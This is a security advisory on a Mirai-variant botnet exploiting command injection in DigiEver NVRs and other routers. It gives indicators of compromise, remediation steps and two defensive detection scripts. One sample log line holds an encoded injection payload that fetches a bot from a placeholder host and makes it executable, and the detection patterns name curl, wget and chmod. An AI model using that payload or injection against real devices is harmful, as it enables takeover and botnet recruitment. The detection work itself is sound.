December 26, 2024
Severity
High
Analysis Summary
A remote code execution vulnerability in DigiEver DS-2105 Pro NVRs, which remains unpatched and has not been assigned a tracking identifier, is being actively exploited by a new Mirai-based botnet. The campaign began in October and targets a wide range of network video recorders and TP-Link routers running out-of-date firmware.
Researchers uncovered one of the flaws exploited in the campaign and presented it at the DefCamp security conference in Bucharest, Romania, last year, noting at the time that multiple DVR devices are affected. Researchers observed the botnet exploiting the vulnerability from mid-November, but also found indications that the campaign had been running since at least September. In addition to the DigiEver vulnerability, the latest Mirai variant targets CVE-2018-17532 in Teltonika RUT9XX routers and CVE-2023-1389 in TP-Link devices.
The remote code execution (RCE) vulnerability used to compromise DigiEver NVRs lies in the '/cgi-bin/cgi_main.cgi' URI, which fails to validate user input correctly. As a result, remote, unauthenticated attackers can use specific parameters, including the ntp field in HTTP POST requests, to inject commands such as "curl" and "chmod". According to researchers, the attacks observed from this Mirai-based botnet resemble those outlined in the DefCamp presentation.
The attackers use the command injection to retrieve the malware binary from an external server and recruit the device into the botnet, adding cron jobs for persistence. Once a device is compromised, exploit sets and credential lists are used to spread to other devices or to carry out distributed denial-of-service (DDoS) attacks. The new Mirai variant is notable for targeting a wide range of system architectures, including x86, ARM, and MIPS, and for using XOR and ChaCha20 encryption.
While the use of sophisticated decryption techniques is not new, it indicates that Mirai-based botnet operators are changing their tactics, techniques, and procedures. This is particularly notable because many Mirai-based botnets still rely on the original string obfuscation logic recycled from the original Mirai source code release.
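The injection point described above (the '/cgi-bin/cgi_main.cgi' URI and its ntp parameter) is narrow enough to detect from web-server or reverse-proxy logs. The following detection script is an added example written for this advisory; it is not code from the advisory's authors or from DigiEver. It assumes a combined-format access log extended with the request body after a " | " separator (a hypothetical convention; a body-logging proxy or WAF in front of the NVR is needed to obtain it), uses constructed sample lines, and flags any ntp value that is not a plain hostname or IP and contains shell metacharacters or the download/chmod utilities the advisory names. The wget pattern is an assumption added here; the advisory only names curl and chmod. The check also covers the same parameter arriving in a GET query string, which goes slightly beyond the POST case in the text.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The endpoint the advisory names as the injection point.
TARGET_PATH = "/cgi-bin/cgi_main.cgi"

# Shell metacharacters that never belong in an NTP server hostname or IP.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")

# Utilities the advisory reports being injected (curl, chmod). wget is an
# assumption added here because it fills the same download role on BusyBox devices.
SUSPECT_CMDS = re.compile(r"\b(curl|wget|chmod)\b")

# What a benign ntp value looks like: a hostname or dotted IPv4 address.
BENIGN_NTP = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")

# Combined log format, extended (hypothetically) with " | <request body>" so that
# POST parameters are visible. Real deployments need a body-logging reverse
# proxy or WAF in front of the NVR to capture the same data.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: \| ?(?P<body>.*))?$'
)

# Constructed sample log (not real traffic). The second line models the
# advisory's description: a POST whose ntp field carries ';'-chained curl and
# chmod commands; the download host is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Nov/2024:10:14:02 +0000] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 200 512 | ntp=pool.ntp.org
198.51.100.7 - - [20/Nov/2024:10:14:09 +0000] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 200 512 | ntp=pool.ntp.org%3Bcurl+http%3A%2F%2Fplaceholder.invalid%2Fbot+-o+%2Ftmp%2Fbot%3Bchmod+%2Bx+%2Ftmp%2Fbot
192.0.2.9 - - [20/Nov/2024:10:15:30 +0000] "GET /index.html HTTP/1.1" 200 1024 |
"""


def analyze_request(method, target, body):
    """Return the reasons a request looks like an injection attempt (empty if benign).

    Both the query string and, for POST, the body are inspected, so the check
    covers the advisory's POST case and a GET carrying the same parameter.
    """
    url = urlsplit(target)
    if url.path != TARGET_PATH:
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # parse_qs also URL-decodes
    if method == "POST" and body:
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    reasons = []
    for value in params.get("ntp", []):
        if BENIGN_NTP.match(value):
            continue
        if SHELL_META.search(value):
            reasons.append("shell metacharacter in ntp")
        cmds = sorted(set(SUSPECT_CMDS.findall(value)))
        if cmds:
            reasons.append("injected command(s): " + ", ".join(cmds))
    return reasons


def scan_log(text):
    """Run analyze_request over every parseable line; return one alert per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_request(m["method"], m["target"], m["body"] or "")
        if reasons:
            alerts.append({"src": m["src"], "ts": m["ts"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['src']}: {'; '.join(alert['reasons'])}")
```

The allow-list check (a bare hostname or IP is accepted before any pattern runs) keeps the rule from firing on legitimate time-server changes, while the metacharacter check catches variants that swap curl and chmod for other utilities. Running it over SAMPLE_LOG yields a single alert for 198.51.100.7.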
Impact
- Code Execution
- Unauthorized Access
- Denial of Service
Indicators of Compromise
Domain Name
- hailcocks.ru
- kingstonwikkerink.dyn
- catvision.dyn
- shitrocket.dyn
- catlovingfools.geek
- hikvision.geek
MD5
- bb9275394716c60d1941432c7085ca13
- 2bc1855eb4297c28116e412b6705e14a
- 0c23d656841504f17958cf6df344ca4a
- d1ec2b1fec7a900c972723fd8a84e15e
- 718b8d27633b002976ab900127af09ad
- da3b2e781acf9fd712d0adb4f7d6f989
SHA-256
- 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
- 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
- b32390e3ed03b99419c736b2eb707886b9966f731e629f23e3af63ea7a91a7af
- dec561cc19458ea127dc1f548fcd0aaa51db007fa8b95c353086cd2d26bfcf02
- a1b73a3fbd2e373a35d3745d563186b06857f594fa5379f6f7401d09476a0c41
- 31813bb69e10b636c785358ca09d7f91979454dc6fc001f750bf03ad8bde8fe5
SHA1
- 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
- 4d8189399c887b335e1d690961e38b806948d9cd
- e76fbda19460ef4872354e4e5d7f9b827719463c
- 17ef5b29eeb3a35057a6095520e4c7c02cd247f3
- 1a98f6da913841951a46311ac474c57ef3f95ea0
- 3472c3ffa4b2049110a8de71a416d8d5235ee6a0
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Regularly update firmware on all network devices, especially those identified as vulnerable.
- Implement strict access controls to limit the exposure of network device interfaces on the internet.
- Use advanced DDoS mitigation services and solutions that can handle high packet and bit rate attacks.
- Conduct frequent security audits and vulnerability assessments on network infrastructure.
- Employ network segmentation to isolate critical infrastructure and reduce the attack surface.
- Increase monitoring and detection capabilities to quickly identify and respond to unusual traffic patterns.
- Collaborate with device manufacturers to address and patch security vulnerabilities promptly.
- Educate and inform users and administrators about the importance of timely updates and secure configurations.
- Implement robust firewall and intrusion prevention systems to filter malicious traffic.
- Develop and maintain an incident response plan to handle DDoS attacks effectively and minimize downtime.
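The first two remediation items (block the indicators, search for them in your environment) are mechanical once the list above is in a machine-readable form. The script below is an added example written for this advisory, not code from its authors: it carries the advisory's domains and hashes as Python sets, runs them against a constructed resolver log and a constructed sha256sum-style file inventory, and matches subdomains of listed domains as well as exact names. It also flags queries into .dyn and .geek that are not on the list, since those TLDs do not exist in the ICANN root and any lookup for them implies an alternative-root resolver on the device; that extension goes slightly beyond the list itself.

```python
# Indicators transcribed from the advisory above. MD5, SHA1 and SHA-256 values
# are pooled into one set; the digest length identifies the algorithm.
IOC_DOMAINS = {
    "hailcocks.ru",
    "kingstonwikkerink.dyn",
    "catvision.dyn",
    "shitrocket.dyn",
    "catlovingfools.geek",
    "hikvision.geek",
}
IOC_HASHES = {
    # MD5
    "bb9275394716c60d1941432c7085ca13",
    "2bc1855eb4297c28116e412b6705e14a",
    "0c23d656841504f17958cf6df344ca4a",
    "d1ec2b1fec7a900c972723fd8a84e15e",
    "718b8d27633b002976ab900127af09ad",
    "da3b2e781acf9fd712d0adb4f7d6f989",
    # SHA-256
    "3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615",
    "0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad",
    "b32390e3ed03b99419c736b2eb707886b9966f731e629f23e3af63ea7a91a7af",
    "dec561cc19458ea127dc1f548fcd0aaa51db007fa8b95c353086cd2d26bfcf02",
    "a1b73a3fbd2e373a35d3745d563186b06857f594fa5379f6f7401d09476a0c41",
    "31813bb69e10b636c785358ca09d7f91979454dc6fc001f750bf03ad8bde8fe5",
    # SHA1
    "43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc",
    "4d8189399c887b335e1d690961e38b806948d9cd",
    "e76fbda19460ef4872354e4e5d7f9b827719463c",
    "17ef5b29eeb3a35057a6095520e4c7c02cd247f3",
    "1a98f6da913841951a46311ac474c57ef3f95ea0",
    "3472c3ffa4b2049110a8de71a416d8d5235ee6a0",
}

# .dyn and .geek are not ICANN TLDs; a query for either can only be answered by
# an alternative-root resolver, so such lookups merit a look even when unlisted.
NON_ICANN_TLDS = {"dyn", "geek"}

# Constructed sample resolver log (not real): "<timestamp> <client> <qname> <qtype>".
SAMPLE_DNS = """\
2024-11-20T10:20:01Z 10.0.5.21 pool.ntp.org A
2024-11-20T10:20:07Z 10.0.5.21 hailcocks.ru A
2024-11-20T10:20:08Z 10.0.5.21 cdn.catvision.dyn. A
2024-11-20T10:20:09Z 10.0.5.33 updates.somewhere.geek A
2024-11-20T10:21:00Z 10.0.5.40 www.example.com A
"""

# Constructed sample file inventory (not real): "<sha256>  <path>", as sha256sum prints it.
SAMPLE_INVENTORY = """\
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615  /tmp/.x/arm7
0000000000000000000000000000000000000000000000000000000000000000  /usr/bin/busybox
"""


def normalize_domain(name):
    """Lower-case and strip a trailing dot so 'Foo.DYN.' compares equal to 'foo.dyn'."""
    return name.strip().rstrip(".").lower()


def classify_query(qname):
    """Return 'ioc' for a listed domain or a subdomain of one, 'non-icann-tld'
    for an unlisted query into .dyn/.geek, or None for anything else."""
    d = normalize_domain(qname)
    for ioc in IOC_DOMAINS:
        if d == ioc or d.endswith("." + ioc):
            return "ioc"
    if d.rsplit(".", 1)[-1] in NON_ICANN_TLDS:
        return "non-icann-tld"
    return None


def match_dns(log_text):
    """Return (client, qname, verdict) for every suspicious query in a resolver log."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        _ts, client, qname = parts[:3]
        verdict = classify_query(qname)
        if verdict:
            hits.append((client, normalize_domain(qname), verdict))
    return hits


def match_hashes(inventory_text):
    """Return (path, digest) for every inventory entry whose digest is a listed IoC."""
    hits = []
    for line in inventory_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        digest, path = parts[0].lower(), parts[1].strip()
        if digest in IOC_HASHES:
            hits.append((path, digest))
    return hits


if __name__ == "__main__":
    for client, qname, verdict in match_dns(SAMPLE_DNS):
        print(f"DNS  {client} -> {qname} [{verdict}]")
    for path, digest in match_hashes(SAMPLE_INVENTORY):
        print(f"FILE {path} matches {digest}")
```

Hash comparison is case-insensitive and the inventory format matches what md5sum, sha1sum and sha256sum emit, so the same function works on output collected from a device over a serial console or SSH. For a fleet, replace the inline samples with the real log and inventory files and feed the hits into your blocking controls.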